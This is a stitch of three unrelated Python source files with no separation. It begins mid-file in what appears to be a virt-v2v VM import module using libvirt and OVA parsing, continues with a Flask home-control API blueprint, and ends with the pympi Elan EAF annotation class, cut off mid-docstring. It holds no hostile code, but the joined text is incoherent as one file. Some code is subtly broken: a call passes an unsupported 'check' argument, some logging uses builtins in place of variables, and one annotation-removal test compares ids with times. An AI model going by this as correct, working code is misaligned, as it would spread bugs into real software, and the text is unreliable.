            vm = con.lookupByName(self._vminfo['vmName'])
            if vm:
                params = {}
                root = ET.fromstring(vm.XMLDesc(0))
                _add_disks(root, params)
                src = []
                fmt = []
                for disk in params['disks']:
                    if 'alias' in disk:
                        src.append(disk['alias'])
                        fmt.append(disk['disktype'])
                return src, fmt

    def _dest_images(self):
        ret = []
        for vol in self._prepared_volumes:
            ret.append(vol['path'])
        return ret


class PipelineProc(object):

    def __init__(self, proc1, proc2):
        self._procs = (proc1, proc2)
        self._stdout = proc2.stdout

    def kill(self):
        """
        Kill all processes in a pipeline.

        Some of the processes may have already terminated, but some may be
        still running. Regular kill() raises OSError if the process has already
        terminated. Since we are dealing with multiple processes, to avoid any
        confusion we do not raise OSError at all.
        """
        for p in self._procs:
            logging.debug("Killing pid=%d", p.pid)
            try:
                p.kill()
            except OSError as e:
                # Probably the process has already terminated
                if e.errno != errno.ESRCH:
                    raise e

    @property
    def pids(self):
        return [p.pid for p in self._procs]

    @property
    def returncode(self):
        """
        Returns None if any of the processes is still running. Returns 0 if all
        processes have finished with a zero exit code, otherwise return first
        nonzero exit code.
        """
        ret = 0
        for p in self._procs:
            p.poll()
            if p.returncode is None:
                return None
            if p.returncode != 0 and ret == 0:
                # One of the processes has failed
                ret = p.returncode

        # All processes have finished
        return ret

    @property
    def stdout(self):
        return self._stdout

    def wait(self, timeout=None):
        if timeout is not None:
            deadline = monotonic_time() + timeout
        else:
            deadline = None

        for p in self._procs:
            if deadline is not None:
                # NOTE: CPopen doesn't support timeout argument.
                while monotonic_time() < deadline:
                    p.poll()
                    if p.returncode is not None:
                        break
                    time.sleep(1)
            else:
                p.wait()

        if deadline is not None:
            if deadline < monotonic_time() or self.returncode is None:
                # Timed out
                return False

        return True


class ImportVm(object):
    TERM_DELAY = 30
    PROC_WAIT_TIMEOUT = 30

    def __init__(self, job_id, command):
        self._id = job_id
        self._command = command
        self._thread = None

        self._status = STATUS.STARTING
        self._description = ''
        self._disk_progress = 0
        self._disk_count = 1
        self._current_disk = 1
        self._aborted = False
        self._proc = None

    def start(self):
        self._thread = concurrent.thread(self._run, name="v2v/" + self._id[:8])
        self._thread.start()

    def wait(self):
        if self._thread is not None and self._thread.is_alive():
            self._thread.join()

    @property
    def id(self):
        return self._id

    @property
    def status(self):
        return self._status

    @property
    def description(self):
        return self._description

    @property
    def progress(self):
        '''
        progress is part of multiple disk_progress its
        flat and not 100% accurate - each disk take its
        portion ie if we have 2 disks the first will take
        0-50 and the second 50-100
        '''
        completed = (self._disk_count - 1) * 100
        return (completed + self._disk_progress) / self._disk_count

    @traceback(msg="Error importing vm")
    def _run(self):
        try:
            self._import()
        except Exception as ex:
            if self._aborted:
                logging.debug("Job %r was aborted", self._id)
            else:
                logging.exception("Job %r failed", self._id)
                self._status = STATUS.FAILED
                self._description = str(ex)
                try:
                    if self._proc is not None:
                        self._abort()
                except Exception as e:
                    logging.exception('Job %r, error trying to abort: %r',
                                      self._id, e)

    def _import(self):
        logging.info('Job %r starting import', self._id)

        with self._command.execute() as self._proc:
            self._watch_process_output()
            self._wait_for_process()

            if self._proc.returncode != 0:
                raise V2VProcessError('Job %r process failed exit-code: %r' %
                                      (self._id,
                                       self._proc.returncode))

            if self._status != STATUS.ABORTED:
                self._status = STATUS.DONE
                logging.info('Job %r finished import successfully',
                             self._id)

    def _wait_for_process(self):
        if self._proc.returncode is not None:
            return
        logging.debug("Job %r waiting for virt-v2v process", self._id)
        if not self._proc.wait(timeout=self.PROC_WAIT_TIMEOUT):
            raise V2VProcessError("Job %r timeout waiting for process pid=%s",
                                  self._id, self._proc.pids)

    def _watch_process_output(self):
        out = io.BufferedReader(io.FileIO(self._proc.stdout.fileno(),
                                mode='r', closefd=False), BUFFSIZE)
        parser = OutputParser()
        for event in parser.parse(out):
            if isinstance(event, ImportProgress):
                self._status = STATUS.COPYING_DISK
                logging.info("Job %r copying disk %d/%d",
                             self._id, event.current_disk, event.disk_count)
                self._disk_progress = 0
                self._current_disk = event.current_disk
                self._disk_count = event.disk_count
                self._description = event.description
            elif isinstance(event, DiskProgress):
                self._disk_progress = event.progress
                if event.progress % 10 == 0:
                    logging.info("Job %r copy disk %d progress %d/100",
                                 self._id, self._current_disk, event.progress)
            else:
                raise RuntimeError("Job %r got unexpected parser event: %s" %
                                   (self._id, event))

    def abort(self):
        self._status = STATUS.ABORTED
        logging.info('Job %r aborting...', self._id)
        self._abort()

    def _abort(self):
        self._aborted = True
        if self._proc is None:
            logging.warning(
                'Ignoring request to abort job %r; the job failed to start',
                self._id)
            return
        if self._proc.returncode is None:
            logging.debug('Job %r killing virt-v2v process', self._id)
            try:
                self._proc.kill()
            except OSError as e:
                if e.errno != errno.ESRCH:
                    raise
                logging.debug('Job %r virt-v2v process not running',
                              self._id)
            else:
                logging.debug('Job %r virt-v2v process was killed',
                              self._id)
            finally:
                for pid in self._proc.pids:
                    zombiereaper.autoReapPID(pid)


class OutputParser(object):
    COPY_DISK_RE = re.compile(r'.*(Copying disk (\d+)/(\d+)).*')
    DISK_PROGRESS_RE = re.compile(r'\s+\((\d+).*')

    def parse(self, stream):
        for line in stream:
            if 'Copying disk' in line:
                description, current_disk, disk_count = self._parse_line(line)
                yield ImportProgress(int(current_disk), int(disk_count),
                                     description)
                for chunk in self._iter_progress(stream):
                    progress = self._parse_progress(chunk)
                    if progress is not None:
                        yield DiskProgress(progress)
                    if progress == 100:
                        break

    def _parse_line(self, line):
        m = self.COPY_DISK_RE.match(line)
        if m is None:
            raise OutputParserError('unexpected format in "Copying disk"'
                                    ', line: %r' % line)
        return m.group(1), m.group(2), m.group(3)

    def _iter_progress(self, stream):
        chunk = ''
        while True:
            c = stream.read(1)
            if not c:
                raise OutputParserError('copy-disk stream closed unexpectedly')
            chunk += c
            if c == '\r':
                yield chunk
                chunk = ''

    def _parse_progress(self, chunk):
        m = self.DISK_PROGRESS_RE.match(chunk)
        if m is None:
            return None
        try:
            return int(m.group(1))
        except ValueError:
            raise OutputParserError('error parsing progress regex: %r'
                                    % m.groups)


def _mem_to_mib(size, unit):
    lunit = unit.lower()
    if lunit in ('bytes', 'b'):
        return size / 1024 / 1024
    elif lunit in ('kib', 'k'):
        return size / 1024
    elif lunit in ('mib', 'm'):
        return size
    elif lunit in ('gib', 'g'):
        return size * 1024
    elif lunit in ('tib', 't'):
        return size * 1024 * 1024
    else:
        raise InvalidVMConfiguration("Invalid currentMemory unit attribute:"
                                     " %r" % unit)


def _list_domains(conn):
    try:
        for vm in conn.listAllDomains():
            yield vm
    # TODO: use only the new API (no need to fall back to listDefinedDomains)
    #       when supported in Xen under RHEL 5.x
    except libvirt.libvirtError as e:
        if e.get_error_code() != libvirt.VIR_ERR_NO_SUPPORT:
            raise
        # Support for old libvirt clients
        seen = set()
        for name in conn.listDefinedDomains():
            try:
                vm = conn.lookupByName(name)
            except libvirt.libvirtError as e:
                logging.error("Error looking up vm %r: %s", name, e)
            else:
                seen.add(name)
                yield vm
        for domainId in conn.listDomainsID():
            try:
                vm = conn.lookupByID(domainId)
            except libvirt.libvirtError as e:
                logging.error("Error looking up vm by id %r: %s", domainId, e)
            else:
                if vm.name() not in seen:
                    yield vm


def _add_vm(conn, vms, vm):
    params = {}
    try:
        _add_vm_info(vm, params)
    except libvirt.libvirtError as e:
        logging.error("error getting domain information: %s", e)
        return
    try:
        xml = vm.XMLDesc(0)
    except libvirt.libvirtError as e:
        logging.error("error getting domain xml for vm %r: %s",
                      vm.name(), e)
        return
    try:
        root = ET.fromstring(xml)
    except ET.ParseError as e:
        logging.error('error parsing domain xml: %s', e)
        return
    if not _block_disk_supported(conn, root):
        return
    try:
        _add_general_info(root, params)
    except InvalidVMConfiguration as e:
        logging.error("error adding general info: %s", e)
        return
    _add_snapshot_info(conn, vm, params)
    _add_networks(root, params)
    _add_disks(root, params)
    _add_graphics(root, params)
    _add_video(root, params)

    disk_info = None
    for disk in params['disks']:
        disk_info = _get_disk_info(conn, disk, vm)
        if disk_info is None:
            break
        disk.update(disk_info)
    if disk_info is not None:
        vms.append(params)
    else:
        logging.warning('Cannot add VM %s due to disk storage error',
                        vm.name())


def _block_disk_supported(conn, root):
    '''
    Currently we do not support importing VMs with block device from
    Xen on Rhel 5.x
    '''
    if conn.getType() == 'Xen':
        block_disks = root.findall('.//disk[@type="block"]')
        block_disks = [d for d in block_disks
                       if d.attrib.get('device', None) == "disk"]
        return len(block_disks) == 0

    return True


def _add_vm_info(vm, params):
    params['vmName'] = vm.name()
    # TODO: use new API: vm.state()[0] == libvirt.VIR_DOMAIN_SHUTOFF
    #       when supported in Xen under RHEL 5.x
    if vm.isActive():
        params['status'] = "Up"
    else:
        params['status'] = "Down"


def _add_general_info(root, params):
    e = root.find('./uuid')
    if e is not None:
        params['vmId'] = e.text

    e = root.find('./currentMemory')
    if e is not None:
        try:
            size = int(e.text)
        except ValueError:
            raise InvalidVMConfiguration("Invalid 'currentMemory' value: %r"
                                         % e.text)
        unit = e.get('unit', 'KiB')
        params['memSize'] = _mem_to_mib(size, unit)

    e = root.find('./vcpu')
    if e is not None:
        try:
            params['smp'] = int(e.text)
        except ValueError:
            raise InvalidVMConfiguration("Invalid 'vcpu' value: %r" % e.text)

    e = root.find('./os/type/[@arch]')
    if e is not None:
        params['arch'] = e.get('arch')


def _get_disk_info(conn, disk, vm):
    if 'alias' in disk.keys():
        try:
            if disk['disktype'] == 'file':
                vol = conn.storageVolLookupByPath(disk['alias'])
                _, capacity, alloc = vol.info()
            elif disk['disktype'] == 'block':
                vol = vm.blockInfo(disk['alias'])
                # We use the physical for allocation
                # in blockInfo can report 0
                capacity, _, alloc = vol
            else:
                logging.error('Unsupported disk type: %r', disk['disktype'])

        except libvirt.libvirtError:
            logging.exception("Error getting disk size")
            return None
        else:
            return {'capacity': str(capacity), 'allocation': str(alloc)}
    return {}


def _convert_disk_format(format):
    # TODO: move to volume format when storage/volume.py
    #       will be accessible for /lib/vdsm/v2v.py
    if format == 'qcow2':
        return 'COW'
    elif format == 'raw':
        return 'RAW'
    raise KeyError


def _add_disks(root, params):
    params['disks'] = []
    disks = root.findall('.//disk[@type="file"]')
    disks = disks + root.findall('.//disk[@type="block"]')
    for disk in disks:
        d = {}
        disktype = disk.get('type')
        device = disk.get('device')
        if device is not None:
            if device == 'cdrom':
                # Skip CD-ROM drives
                continue
            d['type'] = device
        target = disk.find('./target/[@dev]')
        if target is not None:
            d['dev'] = target.get('dev')
        if disktype == 'file':
            d['disktype'] = 'file'
            source = disk.find('./source/[@file]')
            if source is not None:
                d['alias'] = source.get('file')
        elif disktype == 'block':
            d['disktype'] = 'block'
            source = disk.find('./source/[@dev]')
            if source is not None:
                d['alias'] = source.get('dev')
        else:
            logging.error('Unsupported disk type: %r', type)

        driver = disk.find('./driver/[@type]')
        if driver is not None:
            try:
                d["format"] = _convert_disk_format(driver.get('type'))
            except KeyError:
                logging.warning("Disk %s has unsupported format: %r", d,
                                format)
        params['disks'].append(d)


def _add_graphics(root, params):
    e = root.find('./devices/graphics/[@type]')
    if e is not None:
        params['graphics'] = e.get('type')


def _add_video(root, params):
    e = root.find('./devices/video/model/[@type]')
    if e is not None:
        params['video'] = e.get('type')


def _add_networks(root, params):
    params['networks'] = []
    interfaces = root.findall('.//interface')
    for iface in interfaces:
        i = {}
        if 'type' in iface.attrib:
            i['type'] = iface.attrib['type']
        mac = iface.find('./mac/[@address]')
        if mac is not None:
            i['macAddr'] = mac.get('address')
        source = iface.find('./source/[@bridge]')
        if source is not None:
            i['bridge'] = source.get('bridge')
        target = iface.find('./target/[@dev]')
        if target is not None:
            i['dev'] = target.get('dev')
        model = iface.find('./model/[@type]')
        if model is not None:
            i['model'] = model.get('type')
        params['networks'].append(i)


def _add_snapshot_info(conn, vm, params):
    # Snapshot related API is not yet implemented in the libvirt's Xen driver
    if conn.getType() == 'Xen':
        return

    try:
        ret = vm.hasCurrentSnapshot()
    except libvirt.libvirtError:
        logging.exception('Error checking for existing snapshots.')
    else:
        params['has_snapshots'] = ret > 0


def _vm_has_snapshot(vm):
    try:
        return vm.hasCurrentSnapshot() == 1
    except libvirt.libvirtError:
        logging.exception('Error checking if snapshot exist for vm: %s.',
                          vm.name())
        return False


def _read_ovf_from_ova(ova_path):
    """
       virt-v2v support ova in tar, zip formats as well as
       extracted directory
    """
    if os.path.isdir(ova_path):
        return _read_ovf_from_ova_dir(ova_path)
    elif zipfile.is_zipfile(ova_path):
        return _read_ovf_from_zip_ova(ova_path)
    elif tarfile.is_tarfile(ova_path):
        return _read_ovf_from_tar_ova(ova_path)
    raise ClientError('Unknown ova format, supported formats:'
                      ' tar, zip or a directory')


def _find_ovf(entries):
    for entry in entries:
        if '.ovf' == os.path.splitext(entry)[1].lower():
            return entry
    return None


def _read_ovf_from_ova_dir(ova_path):
    files = os.listdir(ova_path)
    name = _find_ovf(files)
    if name is not None:
        with open(os.path.join(ova_path, name), 'r') as ovf_file:
            return ovf_file.read()
    raise ClientError('OVA directory %s does not contain ovf file' % ova_path)


def _read_ovf_from_zip_ova(ova_path):
    with open(ova_path, 'rb') as fh:
        zf = zipfile.ZipFile(fh)
        name = _find_ovf(zf.namelist())
        if name is not None:
            return zf.read(name)
    raise ClientError('OVA does not contains file with .ovf suffix')


def _read_ovf_from_tar_ova(ova_path):
    with tarfile.open(ova_path) as tar:
        for member in tar:
            if member.name.endswith('.ovf'):
                with closing(tar.extractfile(member)) as ovf:
                    return ovf.read()
        raise ClientError('OVA does not contains file with .ovf suffix')


def _add_general_ovf_info(vm, node, ns, ova_path):
    vm['status'] = 'Down'
    vmName = node.find('./ovf:VirtualSystem/ovf:Name', ns)
    if vmName is not None:
        vm['vmName'] = vmName.text
    else:
        vm['vmName'] = os.path.splitext(os.path.basename(ova_path))[0]

    memSize = node.find('.//ovf:Item[rasd:ResourceType="%d"]/'
                        'rasd:VirtualQuantity' % _OVF_RESOURCE_MEMORY, ns)
    if memSize is not None:
        vm['memSize'] = int(memSize.text)
    else:
        raise V2VError('Error parsing ovf information: no memory size')

    smp = node.find('.//ovf:Item[rasd:ResourceType="%d"]/'
                    'rasd:VirtualQuantity' % _OVF_RESOURCE_CPU, ns)
    if smp is not None:
        vm['smp'] = int(smp.text)
    else:
        raise V2VError('Error parsing ovf information: no cpu info')


def _get_max_disk_size(populated_size, size):
    if populated_size is None:
        return size
    if size is None:
        return populated_size
    return str(max(int(populated_size), int(size)))


def _parse_allocation_units(units):
    """
    Parse allocation units of the form "bytes * x * y^z"
    The format is defined in:
    DSP0004: Common Information Model (CIM) Infrastructure,
    ANNEX C.1 Programmatic Units

    We conform only to the subset of the format specification and
    base-units must be bytes.
    """
    # Format description
    sp = '[ \t\n]?'
    base_unit = 'byte'
    operator = '[*]'  # we support only multiplication
    number = '[+]?[0-9]+'  # we support only positive integers
    exponent = '[+]?[0-9]+'  # we support only positive integers
    modifier1 = '(?P<m1>{op}{sp}(?P<m1_num>{num}))'.format(
        op=operator,
        num=number,
        sp=sp)
    modifier2 = \
        '(?P<m2>{op}{sp}' \
        '(?P<m2_base>[0-9]+){sp}\^{sp}(?P<m2_exp>{exp}))'.format(
            op=operator,
            exp=exponent,
            sp=sp)
    r = '^{base_unit}({sp}{mod1})?({sp}{mod2})?$'.format(
        base_unit=base_unit,
        mod1=modifier1,
        mod2=modifier2,
        sp=sp)

    m = re.match(r, units, re.MULTILINE)
    if m is None:
        raise V2VError('Failed to parse allocation units: %r' % units)
    g = m.groupdict()

    ret = 1
    if g['m1'] is not None:
        try:
            ret *= int(g['m1_num'])
        except ValueError:
            raise V2VError("Failed to parse allocation units: %r" % units)
    if g['m2'] is not None:
        try:
            ret *= pow(int(g['m2_base']), int(g['m2_exp']))
        except ValueError:
            raise V2VError("Failed to parse allocation units: %r" % units)

    return ret


def _add_disks_ovf_info(vm, node, ns):
    vm['disks'] = []
    for d in node.findall(".//ovf:DiskSection/ovf:Disk", ns):
        disk = {'type': 'disk'}
        capacity = int(d.attrib.get('{%s}capacity' % _OVF_NS))
        if '{%s}capacityAllocationUnits' % _OVF_NS in d.attrib:
            units = d.attrib.get('{%s}capacityAllocationUnits' % _OVF_NS)
            capacity *= _parse_allocation_units(units)
        disk['capacity'] = str(capacity)
        fileref = d.attrib.get('{%s}fileRef' % _OVF_NS)
        alias = node.find('.//ovf:References/ovf:File[@ovf:id="%s"]' %
                          fileref, ns)
        if alias is not None:
            disk['alias'] = alias.attrib.get('{%s}href' % _OVF_NS)
            populated_size = d.attrib.get('{%s}populatedSize' % _OVF_NS, None)
            size = alias.attrib.get('{%s}size' % _OVF_NS)
            disk['allocation'] = _get_max_disk_size(populated_size, size)
        else:
            raise V2VError('Error parsing ovf information: disk href info')
        vm['disks'].append(disk)


def _add_networks_ovf_info(vm, node, ns):
    vm['networks'] = []
    for n in node.findall('.//ovf:Item[rasd:ResourceType="%d"]'
                          % _OVF_RESOURCE_NETWORK, ns):
        net = {}
        dev = n.find('./rasd:ElementName', ns)
        if dev is not None:
            net['dev'] = dev.text
        else:
            raise V2VError('Error parsing ovf information: '
                           'network element name')

        model = n.find('./rasd:ResourceSubType', ns)
        if model is not None:
            net['model'] = model.text
        else:
            raise V2VError('Error parsing ovf information: network model')

        bridge = n.find('./rasd:Connection', ns)
        if bridge is not None:
            net['bridge'] = bridge.text
            net['type'] = 'bridge'
        else:
            net['type'] = 'interface'
        vm['networks'].append(net)


def _simple_exec_cmd(command, env=None, nice=None, ioclass=None,
                     stdin=None, stdout=None, stderr=None):

    command = wrap_command(command, with_ioclass=ioclass,
                           ioclassdata=None, with_nice=nice,
                           with_setsid=False, with_sudo=False,
                           reset_cpu_affinity=True)

    logging.debug(cmdutils.command_log_line(command, cwd=None))

    p = CPopen(command, close_fds=True, cwd=None, env=env,
               stdin=stdin, stdout=stdout, stderr=stderr)
    return p

# Endpoints for user to control the home.


from datetime import datetime
from flask import Blueprint, jsonify, request
from services import elements_services, home_services

home_api = Blueprint('/home_api', __name__)
elements_services = elements_services.ElementsServices()
home_services = home_services.HomeServices()


@home_api.route('/profiles')
def profiles():
    """Gets all profiles for all elements for user application to display and manipulate elements"""
    return jsonify(home_services.get_profiles())


@home_api.route('/element', methods=['POST'])
def update_element():
    """Updates single element with all new values received from the user application"""
    received_element = request.get_json()
    home_services.update_element(received_element)
    return 'OK'


@home_api.route('/elements', methods=['POST'])
def update_elements():
    """Updates all elements with all new values received from the user application"""
    received_elements = request.get_json()
    home_services.update_elements(received_elements)
    return 'OK'


@home_api.route('/elementdelete', methods=['POST'])
def delete_element():
    """Deletes a single element with given hid"""
    element = request.get_json()
    home_services.delete_element(element['hid'])
    return 'OK'


@home_api.route('/timerules', methods=['POST'])
def timerules():
    """Adds, Updates or deletes time rule for the given element"""
    rules = request.get_json()

    if len(rules) == 0:
        raise Exception("No elements in the list")

    for rule in rules:
        if 'id' not in rule:
            rule['id'] = None

    home_services.save_time_rules(rules)
    return 'OK'

@home_api.route('/timerules/<string:hid>')
def get_timerules(hid):
    """Gets list of timerules for given hid"""
    timerules= home_services.read_time_rules(hid)
    return jsonify(timerules)

# -*- coding: utf-8 -*-

import time
import EafIO
import warnings


class Eaf:
    """Read and write Elan's Eaf files.

    .. note:: All times are in milliseconds and can't have decimals.

    :var dict annotation_document: Annotation document TAG entries.
    :var dict licences: Licences included in the file.
    :var dict header: XML header.
    :var list media_descriptors: Linked files, where every file is of the
                                 form: ``{attrib}``.
    :var list properties: Properties, where every property is of the form:
                          ``(value, {attrib})``.
    :var list linked_file_descriptors: Secondary linked files, where every
                                       linked file is of the form:
                                       ``{attrib}``.
    :var dict timeslots: Timeslot data of the form:
                         ``{TimslotID -> time(ms)}``.
    :var dict tiers: Tier data of the form:
                     ``{tier_name -> (aligned_annotations,
                     reference_annotations, attributes, ordinal)}``,

                     aligned_annotations of the form:
                     ``[{annotation_id ->
                     (begin_ts, end_ts, value, svg_ref)}]``,

                     reference annotations of the form:
                     ``[{annotation_id ->
                     (reference, value, previous, svg_ref)}]``.
    :var list linguistic_types: Linguistic types, where every type is of the
                                form: ``{id -> attrib}``.
    :var list locales: Locales, where every locale is of the form:
                       ``{attrib}``.
    :var dict constraints: Constraint data of the form:
                           ``{stereotype -> description}``.
    :var dict controlled_vocabularies: Controlled vocabulary data of the
                                       form: ``{id ->
                                       (descriptions, entries, ext_ref)}``,

                                       descriptions of the form:
                                       ``[(lang_ref, text)]``,

                                       entries of the form:
                                       ``{id -> (values, ext_ref)}``,

                                       values of the form:
                                       ``[(lang_ref, description, text)]``.
    :var list external_refs: External references, where every reference is of
                             the form ``[id, type, value]``.
    :var list lexicon_refs: Lexicon references, where every reference is of
                            the form: ``[{attribs}]``.
    """

    def __init__(self, file_path=None, author='pympi'):
        """Construct either a new Eaf file or read on from a file/stream.

        :param str file_path: Path to read from, - for stdin. If ``None`` an
                              empty Eaf file will be created.
        :param str author: Author of the file.
        """
        self.naive_gen_ann, self.naive_gen_ts = False, False
        self.annotation_document = {
            'AUTHOR': author,
            'DATE': time.strftime("%Y-%m-%dT%H:%M:%S%z"),
            'VERSION': '2.8',
            'FORMAT': '2.8',
            'xmlns:xsi': 'http://www.w3.org/2001/XMLSchema-instance',
            'xsi:noNamespaceSchemaLocation':
                'http://www.mpi.nl/tools/elan/EAFv2.8.xsd'}
        self.constraints = {}
        self.controlled_vocabularies = {}
        self.header = {}
        self.licences = {}
        self.linguistic_types = {}
        self.tiers = {}
        self.timeslots = {}
        self.external_refs = []
        self.lexicon_refs = []
        self.linked_file_descriptors = []
        self.locales = []
        self.media_descriptors = []
        self.properties = []
        self.new_time, self.new_ann = 0, 0

        if file_path is None:
            self.add_linguistic_type('default-lt', None)
            self.constraints = {'Time_Subdivision': 'Time subdivision of paren'
                                't annotation\'s time interval, no time gaps a'
                                'llowed within this interval',
                                'Symbolic_Subdivision': 'Symbolic subdivision '
                                'of a parent annotation. Annotations refering '
                                'to the same parent are ordered',
                                'Symbolic_Association': '1-1 association with '
                                'a parent annotation',
                                'Included_In': 'Time alignable annotations wit'
                                'hin the parent annotation\'s time interval, g'
                                'aps are allowed'}
            self.properties.append(('0', {'NAME': 'lastUsedAnnotation'}))
            self.add_tier('default')
        else:
            EafIO.parse_eaf(file_path, self)

    def to_file(self, file_path, pretty=True):
        """Write the object to a file, if the file already exists a backup will
        be created with the ``.bak`` suffix.

        :param str file_path: Path to write to, - for stdout.
        :param bool pretty: Flag for pretty XML printing.
        """
        EafIO.to_eaf(file_path, self, pretty)

    def to_textgrid(self, excluded_tiers=[], included_tiers=[]):
        """Convert the object to a :class:`pympi.Praat.TextGrid` object.

        :param list excluded_tiers: Specifically exclude these tiers.
        :param list included_tiers: Only include this tiers, when empty all are
                                    included.
        :returns: :class:`pympi.Praat.TextGrid` object
        :raises ImportError: If the pympi.Praat module can't be loaded.
        """
        from Praat import TextGrid
        tgout = TextGrid()
        tiers = [a for a in self.tiers if a not in excluded_tiers]
        if included_tiers:
            tiers = [a for a in tiers if a in included_tiers]
        for tier in tiers:
            currentTier = tgout.add_tier(tier)
            for interval in self.get_annotation_data_for_tier(tier):
                if interval[0] == interval[1]:
                    continue
                currentTier.add_interval(interval[0]/1000.0,
                                         interval[1]/1000.0, interval[2])
        return tgout

    def extract(self, start, end):
        """Extracts the selected time frame as a new object.

        :param int start: Start time.
        :param int end: End time.
        :returns: The extracted frame in a new object.
        """
        from copy import deepcopy
        eaf_out = deepcopy(self)
        for tier in eaf_out.tiers.itervalues():
            rems = []
            for ann in tier[0]:
                if eaf_out.timeslots[tier[0][ann][1]] > end or\
                        eaf_out.timeslots[tier[0][ann][0]] < start:
                    rems.append(ann)
            for r in rems:
                del tier[0][r]
        return eaf_out

    def get_linked_files(self):
        """Give all linked files."""
        return self.media_descriptors

    def add_linked_file(self, file_path, relpath=None, mimetype=None,
                        time_origin=None, ex_from=None):
        """Add a linked file.

        :param str file_path: Path of the file.
        :param str relpath: Relative path of the file.
        :param str mimetype: Mimetype of the file, if ``None`` it tries to
                             guess it according to the file extension which
                             currently only works for wav, mpg, mpeg and xml.
        :param int time_origin: Time origin for the media file.
        :param str ex_from: Extracted from field.
        :raises KeyError: If mimetype had to be guessed and a non standard
                          extension or an unknown mimetype.
        """
        if mimetype is None:
            mimes = {'wav': 'audio/x-wav', 'mpg': 'video/mpeg',
                     'mpeg': 'video/mpg', 'xml': 'text/xml'}
            mimetype = mimes[file_path.split('.')[-1]]
        self.media_descriptors.append({
            'MEDIA_URL': file_path, 'RELATIVE_MEDIA_URL': relpath,
            'MIME_TYPE': mimetype, 'TIME_ORIGIN': time_origin,
            'EXTRACTED_FROM': ex_from})

    def copy_tier(self, eaf_obj, tier_name):
        """Copies a tier to another :class:`pympi.Elan.Eaf` object.

        :param pympi.Elan.Eaf eaf_obj: Target Eaf object.
        :param str tier_name: Name of the tier.
        :raises KeyError: If the tier doesn't exist.
        """
        eaf_obj.remove_tier(tier_name)
        eaf_obj.add_tier(tier_name, tier_dict=self.tiers[tier_name][3])
        for ann in self.get_annotation_data_for_tier(tier_name):
            eaf_obj.insert_annotation(tier_name, ann[0], ann[1], ann[2])

    def add_tier(self, tier_id, ling='default-lt', parent=None, locale=None,
                 part=None, ann=None, tier_dict=None):
        """Add a tier.

        :param str tier_id: Name of the tier.
        :param str ling: Linguistic type, if the type is not available it will
                         warn and pick the first available type.
        :param str parent: Parent tier name.
        :param str locale: Locale.
        :param str part: Participant.
        :param str ann: Annotator.
        :param dict tier_dict: TAG attributes, when this is not ``None`` it
                               will ignore all other options.
        """
        if ling not in self.linguistic_types:
            warnings.warn(
                'add_tier: Linguistic type non existent, choosing the first')
            ling = self.linguistic_types.keys()[0]
        if tier_dict is None:
            self.tiers[tier_id] = ({}, {}, {
                'TIER_ID': tier_id,
                'LINGUISTIC_TYPE_REF': ling,
                'PARENT_REF': parent,
                'PARTICIPANT': part,
                'DEFAULT_LOCALE': locale,
                'ANNOTATOR': ann}, len(self.tiers))
        else:
            self.tiers[tier_id] = ({}, {}, tier_dict, len(self.tiers))

    def remove_tiers(self, tiers):
        """Remove multiple tiers, note that this is a lot faster then removing
        them individually because of the delayed cleaning of timeslots.

        :param list tiers: Names of the tier to remove.
        :raises KeyError: If a tier is non existent.
        """
        for a in tiers:
            self.remove_tier(a, check=False, clean=False)
        self.clean_time_slots()

    def remove_tier(self, id_tier, clean=True):
        """Remove tier.

        :param str id_tier: Name of the tier.
        :param bool clean: Flag to also clean the timeslots.
        :raises KeyError: If tier is non existent.
        """
        del(self.tiers[id_tier])
        if clean:
            self.clean_time_slots()

    def get_tier_names(self):
        """List all the tier names.

        :returns: List of all tier names
        """
        return self.tiers.keys()

    def get_parameters_for_tier(self, id_tier):
        """Give the parameter dictionary, this is usaable in :func:`add_tier`.

        :param str id_tier: Name of the tier.
        :returns: Dictionary of parameters.
        :raises KeyError: If the tier is non existent.
        """
        return self.tiers[id_tier][2]

    def child_tiers_for(self, id_tier):
        """Give all child tiers for a tier.

        :param str id_tier: Name of the tier.
        :returns: List of all children
        :raises KeyError: If the tier is non existent.
        """
        return [m for m in self.tiers if 'PARENT_REF' in self.tiers[m][2] and
                self.tiers[m][2]['PARENT_REF'] == id_tier]

    def get_annotation_data_for_tier(self, id_tier):
        """Gives a list of annotations of the form: ``(begin, end, value)``

        :param str id_tier: Name of the tier.
        :raises KeyError: If the tier is non existent.
        """
        a = self.tiers[id_tier][0]
        return [(self.timeslots[a[b][0]], self.timeslots[a[b][1]], a[b][2])
                for b in a]

    def get_annotation_data_at_time(self, id_tier, time):
        """Give the annotations at the given time.

        :param str id_tier: Name of the tier.
        :param int time: Time of the annotation.
        :returns: List of annotations at that time.
        :raises KeyError: If the tier is non existent.
        """
        anns = self.tiers[id_tier][0]
        return sorted(
            [(self.timeslots[m[0]], self.timeslots[m[1]], m[2])
                for m in anns.itervalues() if
                self.timeslots[m[0]] <= time and
                self.timeslots[m[1]] >= time])

    def get_annotation_datas_between_times(self, id_tier, start, end):
        """Gives the annotations within the times.

        :param str id_tier: Name of the tier.
        :param int start: Start time of the annotation.
        :param int end: End time of the annotation.
        :returns: List of annotations within that time.
        :raises KeyError: If the tier is non existent.
        """
        anns = self.tiers[id_tier][0]
        return sorted([
            (self.timeslots[m[0]], self.timeslots[m[1]], m[2])
            for m in anns.itervalues() if self.timeslots[m[1]] >= start and
            self.timeslots[m[0]] <= end])

    def remove_all_annotations_from_tier(self, id_tier):
        """remove all annotations from a tier

        :param str id_tier: Name of the tier.
        :raises KeyError: If the tier is non existent.
        """
        self.tiers[id_tier][0], self.tiers[id_tier][1] = {}, {}
        self.clean_time_slots()

    def insert_annotation(self, id_tier, start, end, value='', svg_ref=None):
        """Insert an annotation.

        :param str id_tier: Name of the tier.
        :param int start: Start time of the annotation.
        :param int end: End time of the annotation.
        :param str value: Value of the annotation.
        :param str svg_ref: Svg reference.
        :raises KeyError: If the tier is non existent.
        """
        start_ts = self.generate_ts_id(start)
        end_ts = self.generate_ts_id(end)
        self.tiers[id_tier][0][self.generate_annotation_id()] =\
            (start_ts, end_ts, value, svg_ref)

    def remove_annotation(self, id_tier, time, clean=True):
        """Remove an annotation in a tier, if you need speed the best thing is
        to clean the timeslots after the last removal.

        :param str id_tier: Name of the tier.
        :param int time: Timepoint within the annotation.
        :param bool clean: Flag to clean the timeslots afterwards.
        :raises KeyError: If the tier is non existent.
        """
        for b in [a for a in self.tiers[id_tier][0].iteritems() if
                  a[1][0] >= time and a[1][1] <= time]:
            del(self.tiers[id_tier][0][b[0]])
        if clean:
            self.clean_time_slots()

    def insert_ref_annotation(self, id_tier, ref, value, prev, svg_ref=None):
        """Insert a reference annotation.

        :param str id_tier: Name of the tier.
        :param str ref: Id of the referenced annotation.
        :param str value: Value of the annotation.
